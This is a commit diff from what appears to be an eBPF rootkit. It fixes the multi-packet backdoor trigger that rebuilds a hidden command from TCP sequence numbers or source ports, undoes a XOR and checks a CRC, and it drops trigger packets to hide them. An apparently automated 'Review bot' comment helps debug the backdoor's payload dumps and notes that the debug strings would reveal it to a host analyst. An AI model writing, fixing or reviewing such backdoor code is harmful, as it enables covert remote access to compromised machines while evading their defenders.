Fixed a bug where tcpport mode in the multi-packet backdoor did not work if a previous trigger using seqnum mode was made
Binary file not shown.
24923
src/.output/kit.skel.h
24923
src/.output/kit.skel.h
File diff suppressed because it is too large
BIN
src/bin/kit
BIN
src/bin/kit
Binary file not shown.
@@ -201,32 +201,33 @@ static __always_inline int manage_backdoor_trigger_v3_32(struct backdoor_packet_
|
|||||||
//The following routine (not just the next check) is necessarily dirty in terms of programming,
|
//The following routine (not just the next check) is necessarily dirty in terms of programming,
|
||||||
//but the ebpf verifier strongly dislikes MOD operations (check report, screenshot)
|
//but the ebpf verifier strongly dislikes MOD operations (check report, screenshot)
|
||||||
char payload[CC_STREAM_TRIGGER_PAYLOAD_LEN_MODE_SEQ_NUM] = {0};
|
char payload[CC_STREAM_TRIGGER_PAYLOAD_LEN_MODE_SEQ_NUM] = {0};
|
||||||
|
int p_index = 0;
|
||||||
if(first_packet == 0){
|
if(first_packet == 0){
|
||||||
for(int ii=first_packet; ii<3; ii++){
|
for(int ii=first_packet; ii<3; ii++, p_index++){
|
||||||
__u32 seq_num = b_data.trigger_array[ii].seq_raw;
|
__u32 seq_num = b_data.trigger_array[ii].seq_raw;
|
||||||
__builtin_memcpy(payload+(CC_STREAM_TRIGGER_PACKET_CAPACITY_BYTES_MODE_SEQ_NUM*ii), &(seq_num), sizeof(__u32));
|
__builtin_memcpy(payload+(CC_STREAM_TRIGGER_PACKET_CAPACITY_BYTES_MODE_SEQ_NUM*p_index), &(seq_num), sizeof(__u32));
|
||||||
}
|
}
|
||||||
for(int ii=0; ii<first_packet; ii++){
|
for(int ii=0; ii<first_packet; ii++, p_index++){
|
||||||
__u32 seq_num = b_data.trigger_array[ii].seq_raw;
|
__u32 seq_num = b_data.trigger_array[ii].seq_raw;
|
||||||
__builtin_memcpy(payload+(CC_STREAM_TRIGGER_PACKET_CAPACITY_BYTES_MODE_SEQ_NUM*ii), &(seq_num), sizeof(__u32));
|
__builtin_memcpy(payload+(CC_STREAM_TRIGGER_PACKET_CAPACITY_BYTES_MODE_SEQ_NUM*p_index), &(seq_num), sizeof(__u32));
|
||||||
}
|
}
|
||||||
}else if(first_packet == 1){
|
}else if(first_packet == 1){
|
||||||
for(int ii=first_packet; ii<3; ii++){
|
for(int ii=first_packet; ii<3; ii++, p_index++){
|
||||||
__u32 seq_num = b_data.trigger_array[ii].seq_raw;
|
__u32 seq_num = b_data.trigger_array[ii].seq_raw;
|
||||||
__builtin_memcpy(payload+(CC_STREAM_TRIGGER_PACKET_CAPACITY_BYTES_MODE_SEQ_NUM*ii), &(seq_num), sizeof(__u32));
|
__builtin_memcpy(payload+(CC_STREAM_TRIGGER_PACKET_CAPACITY_BYTES_MODE_SEQ_NUM*p_index), &(seq_num), sizeof(__u32));
|
||||||
}
|
}
|
||||||
for(int ii=0; ii<first_packet; ii++){
|
for(int ii=0; ii<first_packet; ii++, p_index++){
|
||||||
__u32 seq_num = b_data.trigger_array[ii].seq_raw;
|
__u32 seq_num = b_data.trigger_array[ii].seq_raw;
|
||||||
__builtin_memcpy(payload+(CC_STREAM_TRIGGER_PACKET_CAPACITY_BYTES_MODE_SEQ_NUM*ii), &(seq_num), sizeof(__u32));
|
__builtin_memcpy(payload+(CC_STREAM_TRIGGER_PACKET_CAPACITY_BYTES_MODE_SEQ_NUM*p_index), &(seq_num), sizeof(__u32));
|
||||||
}
|
}
|
||||||
}else if(first_packet == 2){
|
}else if(first_packet == 2){
|
||||||
for(int ii=first_packet; ii<3; ii++){
|
for(int ii=first_packet; ii<3; ii++, p_index++){
|
||||||
__u32 seq_num = b_data.trigger_array[ii].seq_raw;
|
__u32 seq_num = b_data.trigger_array[ii].seq_raw;
|
||||||
__builtin_memcpy(payload+(CC_STREAM_TRIGGER_PACKET_CAPACITY_BYTES_MODE_SEQ_NUM*ii), &(seq_num), sizeof(__u32));
|
__builtin_memcpy(payload+(CC_STREAM_TRIGGER_PACKET_CAPACITY_BYTES_MODE_SEQ_NUM*p_index), &(seq_num), sizeof(__u32));
|
||||||
}
|
}
|
||||||
for(int ii=0; ii<first_packet; ii++){
|
for(int ii=0; ii<first_packet; ii++, p_index++){
|
||||||
__u32 seq_num = b_data.trigger_array[ii].seq_raw;
|
__u32 seq_num = b_data.trigger_array[ii].seq_raw;
|
||||||
__builtin_memcpy(payload+(CC_STREAM_TRIGGER_PACKET_CAPACITY_BYTES_MODE_SEQ_NUM*ii), &(seq_num), sizeof(__u32));
|
__builtin_memcpy(payload+(CC_STREAM_TRIGGER_PACKET_CAPACITY_BYTES_MODE_SEQ_NUM*p_index), &(seq_num), sizeof(__u32));
|
||||||
}
|
}
|
||||||
}
|
}
|
||||||
|
|
||||||
@@ -321,71 +322,72 @@ static __always_inline int manage_backdoor_trigger_v3_16(struct backdoor_packet_
|
|||||||
}else{
|
}else{
|
||||||
first_packet = 0;
|
first_packet = 0;
|
||||||
}
|
}
|
||||||
|
bpf_printk("BACKDOOR 16: FP:%i, LR:%i\n", first_packet, last_received);
|
||||||
//The following routine is necessarily dirty in terms of programming,
|
//The following routine is necessarily dirty in terms of programming,
|
||||||
//but the ebpf verifier strongly dislikes MOD operations (check report, screenshot)
|
//but the ebpf verifier strongly dislikes MOD operations (check report, screenshot)
|
||||||
char payload[CC_STREAM_TRIGGER_PAYLOAD_LEN_MODE_SRC_PORT] = {0};
|
char payload[CC_STREAM_TRIGGER_PAYLOAD_LEN_MODE_SRC_PORT] = {0};
|
||||||
|
int p_index = 0;
|
||||||
if(first_packet == 0){
|
if(first_packet == 0){
|
||||||
for(int ii=first_packet; ii<6; ii++){
|
for(int ii=first_packet; ii<6; ii++, p_index++){
|
||||||
__u16 src_port = b_data.trigger_array[ii].src_port;
|
__u16 src_port = b_data.trigger_array[ii].src_port;
|
||||||
__builtin_memcpy(payload+(CC_STREAM_TRIGGER_PACKET_CAPACITY_BYTES_MODE_SRC_PORT*ii), &(src_port), sizeof(__u16));
|
__builtin_memcpy(payload+(CC_STREAM_TRIGGER_PACKET_CAPACITY_BYTES_MODE_SRC_PORT*p_index), &(src_port), sizeof(__u16));
|
||||||
}
|
}
|
||||||
for(int ii=0; ii<first_packet; ii++){
|
for(int ii=0; ii<first_packet; ii++, p_index++){
|
||||||
__u16 src_port = b_data.trigger_array[ii].src_port;
|
__u16 src_port = b_data.trigger_array[ii].src_port;
|
||||||
__builtin_memcpy(payload+(CC_STREAM_TRIGGER_PACKET_CAPACITY_BYTES_MODE_SRC_PORT*ii), &(src_port), sizeof(__u16));
|
__builtin_memcpy(payload+(CC_STREAM_TRIGGER_PACKET_CAPACITY_BYTES_MODE_SRC_PORT*p_index), &(src_port), sizeof(__u16));
|
||||||
}
|
}
|
||||||
}else if(first_packet == 1){
|
}else if(first_packet == 1){
|
||||||
for(int ii=first_packet; ii<6; ii++){
|
for(int ii=first_packet; ii<6; ii++, p_index++){
|
||||||
__u16 src_port = b_data.trigger_array[ii].src_port;
|
__u16 src_port = b_data.trigger_array[ii].src_port;
|
||||||
__builtin_memcpy(payload+(CC_STREAM_TRIGGER_PACKET_CAPACITY_BYTES_MODE_SRC_PORT*ii), &(src_port), sizeof(__u16));
|
__builtin_memcpy(payload+(CC_STREAM_TRIGGER_PACKET_CAPACITY_BYTES_MODE_SRC_PORT*p_index), &(src_port), sizeof(__u16));
|
||||||
}
|
}
|
||||||
for(int ii=0; ii<first_packet; ii++){
|
for(int ii=0; ii<first_packet; ii++, p_index++){
|
||||||
__u16 src_port = b_data.trigger_array[ii].src_port;
|
__u16 src_port = b_data.trigger_array[ii].src_port;
|
||||||
__builtin_memcpy(payload+(CC_STREAM_TRIGGER_PACKET_CAPACITY_BYTES_MODE_SRC_PORT*ii), &(src_port), sizeof(__u16));
|
__builtin_memcpy(payload+(CC_STREAM_TRIGGER_PACKET_CAPACITY_BYTES_MODE_SRC_PORT*p_index), &(src_port), sizeof(__u16));
|
||||||
}
|
}
|
||||||
}else if(first_packet == 2){
|
}else if(first_packet == 2){
|
||||||
for(int ii=first_packet; ii<6; ii++){
|
for(int ii=first_packet; ii<6; ii++, p_index++){
|
||||||
__u16 src_port = b_data.trigger_array[ii].src_port;
|
__u16 src_port = b_data.trigger_array[ii].src_port;
|
||||||
__builtin_memcpy(payload+(CC_STREAM_TRIGGER_PACKET_CAPACITY_BYTES_MODE_SRC_PORT*ii), &(src_port), sizeof(__u16));
|
__builtin_memcpy(payload+(CC_STREAM_TRIGGER_PACKET_CAPACITY_BYTES_MODE_SRC_PORT*p_index), &(src_port), sizeof(__u16));
|
||||||
}
|
}
|
||||||
for(int ii=0; ii<first_packet; ii++){
|
for(int ii=0; ii<first_packet; ii++, p_index++){
|
||||||
__u16 src_port = b_data.trigger_array[ii].src_port;
|
__u16 src_port = b_data.trigger_array[ii].src_port;
|
||||||
__builtin_memcpy(payload+(CC_STREAM_TRIGGER_PACKET_CAPACITY_BYTES_MODE_SRC_PORT*ii), &(src_port), sizeof(__u16));
|
__builtin_memcpy(payload+(CC_STREAM_TRIGGER_PACKET_CAPACITY_BYTES_MODE_SRC_PORT*p_index), &(src_port), sizeof(__u16));
|
||||||
}
|
}
|
||||||
}else if(first_packet == 3){
|
}else if(first_packet == 3){
|
||||||
for(int ii=first_packet; ii<6; ii++){
|
for(int ii=first_packet; ii<6; ii++, p_index++){
|
||||||
__u16 src_port = b_data.trigger_array[ii].src_port;
|
__u16 src_port = b_data.trigger_array[ii].src_port;
|
||||||
__builtin_memcpy(payload+(CC_STREAM_TRIGGER_PACKET_CAPACITY_BYTES_MODE_SRC_PORT*ii), &(src_port), sizeof(__u16));
|
__builtin_memcpy(payload+(CC_STREAM_TRIGGER_PACKET_CAPACITY_BYTES_MODE_SRC_PORT*p_index), &(src_port), sizeof(__u16));
|
||||||
}
|
}
|
||||||
for(int ii=0; ii<first_packet; ii++){
|
for(int ii=0; ii<first_packet; ii++, p_index++){
|
||||||
__u16 src_port = b_data.trigger_array[ii].src_port;
|
__u16 src_port = b_data.trigger_array[ii].src_port;
|
||||||
__builtin_memcpy(payload+(CC_STREAM_TRIGGER_PACKET_CAPACITY_BYTES_MODE_SRC_PORT*ii), &(src_port), sizeof(__u16));
|
__builtin_memcpy(payload+(CC_STREAM_TRIGGER_PACKET_CAPACITY_BYTES_MODE_SRC_PORT*p_index), &(src_port), sizeof(__u16));
|
||||||
}
|
}
|
||||||
}else if(first_packet == 4){
|
}else if(first_packet == 4){
|
||||||
for(int ii=first_packet; ii<6; ii++){
|
for(int ii=first_packet; ii<6; ii++, p_index++){
|
||||||
__u16 src_port = b_data.trigger_array[ii].src_port;
|
__u16 src_port = b_data.trigger_array[ii].src_port;
|
||||||
__builtin_memcpy(payload+(CC_STREAM_TRIGGER_PACKET_CAPACITY_BYTES_MODE_SRC_PORT*ii), &(src_port), sizeof(__u16));
|
__builtin_memcpy(payload+(CC_STREAM_TRIGGER_PACKET_CAPACITY_BYTES_MODE_SRC_PORT*p_index), &(src_port), sizeof(__u16));
|
||||||
}
|
}
|
||||||
for(int ii=0; ii<first_packet; ii++){
|
for(int ii=0; ii<first_packet; ii++, p_index++){
|
||||||
__u16 src_port = b_data.trigger_array[ii].src_port;
|
__u16 src_port = b_data.trigger_array[ii].src_port;
|
||||||
__builtin_memcpy(payload+(CC_STREAM_TRIGGER_PACKET_CAPACITY_BYTES_MODE_SRC_PORT*ii), &(src_port), sizeof(__u16));
|
__builtin_memcpy(payload+(CC_STREAM_TRIGGER_PACKET_CAPACITY_BYTES_MODE_SRC_PORT*p_index), &(src_port), sizeof(__u16));
|
||||||
}
|
}
|
||||||
}else if(first_packet == 5){
|
}else if(first_packet == 5){
|
||||||
for(int ii=first_packet; ii<6; ii++){
|
for(int ii=first_packet; ii<6; ii++, p_index++){
|
||||||
__u16 src_port = b_data.trigger_array[ii].src_port;
|
__u16 src_port = b_data.trigger_array[ii].src_port;
|
||||||
__builtin_memcpy(payload+(CC_STREAM_TRIGGER_PACKET_CAPACITY_BYTES_MODE_SRC_PORT*ii), &(src_port), sizeof(__u16));
|
__builtin_memcpy(payload+(CC_STREAM_TRIGGER_PACKET_CAPACITY_BYTES_MODE_SRC_PORT*p_index), &(src_port), sizeof(__u16));
|
||||||
}
|
}
|
||||||
for(int ii=0; ii<first_packet; ii++){
|
for(int ii=0; ii<first_packet; ii++, p_index++){
|
||||||
__u16 src_port = b_data.trigger_array[ii].src_port;
|
__u16 src_port = b_data.trigger_array[ii].src_port;
|
||||||
__builtin_memcpy(payload+(CC_STREAM_TRIGGER_PACKET_CAPACITY_BYTES_MODE_SRC_PORT*ii), &(src_port), sizeof(__u16));
|
__builtin_memcpy(payload+(CC_STREAM_TRIGGER_PACKET_CAPACITY_BYTES_MODE_SRC_PORT*p_index), &(src_port), sizeof(__u16));
|
||||||
}
|
}
|
||||||
}
|
}
|
||||||
|
|
||||||
/*bpf_printk("Payload before XOR: ");
|
bpf_printk("Payload before XOR: ");
|
||||||
for(int ii=0; ii<CC_STREAM_TRIGGER_PAYLOAD_LEN_MODE_SRC_PORT; ii++){
|
for(int ii=0; ii<CC_STREAM_TRIGGER_PAYLOAD_LEN_MODE_SRC_PORT; ii++){
|
||||||
bpf_printk("%x", payload[ii]);
|
bpf_printk("%x", payload[ii]);
|
||||||
}
|
}
|
||||||
bpf_printk("\n");*/
|
bpf_printk("\n");
|
||||||
|
|
||||||
//Now that we have the possible complete stream, let's search for the secret backdoor combination in it
|
//Now that we have the possible complete stream, let's search for the secret backdoor combination in it
|
||||||
//First undo running XOR
|
//First undo running XOR
|
||||||
@@ -394,11 +396,11 @@ static __always_inline int manage_backdoor_trigger_v3_16(struct backdoor_packet_
|
|||||||
__builtin_memcpy(payload+ii, (char*)&(xor_res), 0x01);
|
__builtin_memcpy(payload+ii, (char*)&(xor_res), 0x01);
|
||||||
}
|
}
|
||||||
|
|
||||||
/*bpf_printk("Payload after XOR: ");
|
bpf_printk("Payload after XOR: ");
|
||||||
for(int ii=0; ii<CC_STREAM_TRIGGER_PAYLOAD_LEN_MODE_SRC_PORT; ii++){
|
for(int ii=0; ii<CC_STREAM_TRIGGER_PAYLOAD_LEN_MODE_SRC_PORT; ii++){
|
||||||
bpf_printk("%x", payload[ii]);
|
bpf_printk("%x", payload[ii]);
|
||||||
}
|
}
|
||||||
bpf_printk("\n");*/
|
bpf_printk("\n");
|
||||||
|
|
||||||
//Now compute CRC
|
//Now compute CRC
|
||||||
__u8 x;
|
__u8 x;
|
||||||
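Review bot: The two payload dump loops this commit re-enables in manage_backdoor_trigger_v3_16 ("Payload before XOR" and "Payload after XOR") pass `payload[ii]`, a plain `char`, to `%x`; where `char` is signed, any byte of 0x80 or above is sign-extended and would print as `ffffffxx` rather than as the byte. Casting at the call site keeps the dump faithful: `bpf_printk("%x", (unsigned char)payload[ii]);`. Each `bpf_printk` call also emits its own record in the kernel trace buffer, so the label, the bytes and the trailing `"\n"` will not come out as one line. These dumps and the added `BACKDOOR 16: FP:%i, LR:%i` message are not mentioned in the commit title, and their fixed strings end up in the trace pipe, which is where a host analyst would see them. The function body starts and ends outside the hunks shown.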
|
|||||||
@@ -214,6 +214,7 @@ int xdp_receive(struct xdp_md *ctx){
|
|||||||
//where for other purpose, we must still check it)
|
//where for other purpose, we must still check it)
|
||||||
int ret = manage_backdoor_trigger_v3_32(b_new_data_32);
|
int ret = manage_backdoor_trigger_v3_32(b_new_data_32);
|
||||||
if(ret == 1){
|
if(ret == 1){
|
||||||
|
//The packet was for the backdoor, better hide it
|
||||||
return XDP_DROP;
|
return XDP_DROP;
|
||||||
}
|
}
|
||||||
}
|
}
|
||||||
@@ -227,7 +228,6 @@ int xdp_receive(struct xdp_md *ctx){
|
|||||||
bpf_map_update_elem(&backdoor_packet_log_32, &ipvalue, &b_new_data_32, BPF_ANY);
|
bpf_map_update_elem(&backdoor_packet_log_32, &ipvalue, &b_new_data_32, BPF_ANY);
|
||||||
}
|
}
|
||||||
|
|
||||||
|
|
||||||
////16 bit 6-len streams
|
////16 bit 6-len streams
|
||||||
struct backdoor_packet_log_data_16 *b_data_16 = (struct backdoor_packet_log_data_16*) bpf_map_lookup_elem(&backdoor_packet_log_16, &ipvalue);
|
struct backdoor_packet_log_data_16 *b_data_16 = (struct backdoor_packet_log_data_16*) bpf_map_lookup_elem(&backdoor_packet_log_16, &ipvalue);
|
||||||
struct backdoor_packet_log_data_16 b_new_data_16 = {0};
|
struct backdoor_packet_log_data_16 b_new_data_16 = {0};
|
||||||
|
|||||||